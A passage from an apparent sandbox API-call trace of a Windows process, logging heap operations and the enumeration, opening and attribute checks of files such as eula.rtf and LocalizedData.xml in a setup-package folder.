Size=0x40) returned 0x535b0 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0060.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.112] AreFileApisANSI () returned 1 [0060.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1025\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0060.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.112] AreFileApisANSI () returned 1 [0060.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0060.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0060.113] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.113] GetFileType (hFile=0x420) returned 0x1 [0060.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0060.113] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.114] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.114] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.114] CloseHandle (hObject=0x420) returned 1 [0060.114] AreFileApisANSI () returned 1 [0060.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0060.114] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.114] GetFileType (hFile=0x420) returned 0x1 [0060.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.114] CloseHandle (hObject=0x420) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.115] AreFileApisANSI () returned 1 [0060.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0060.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0060.115] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f)) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.116] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0060.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0060.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.117] AreFileApisANSI () returned 1 [0060.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0060.117] AreFileApisANSI () returned 1 [0060.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0060.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0060.117] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.120] GetFileType (hFile=0x420) returned 0x1 [0060.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.120] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.120] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.121] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.121] CloseHandle (hObject=0x420) returned 1 [0060.121] AreFileApisANSI () returned 1 [0060.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0060.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0060.121] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.121] GetFileType (hFile=0x420) returned 0x1 [0060.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.121] CloseHandle (hObject=0x420) returned 1 [0060.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.122] AreFileApisANSI () returned 1 [0060.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0060.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0060.122] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6)) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.123] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 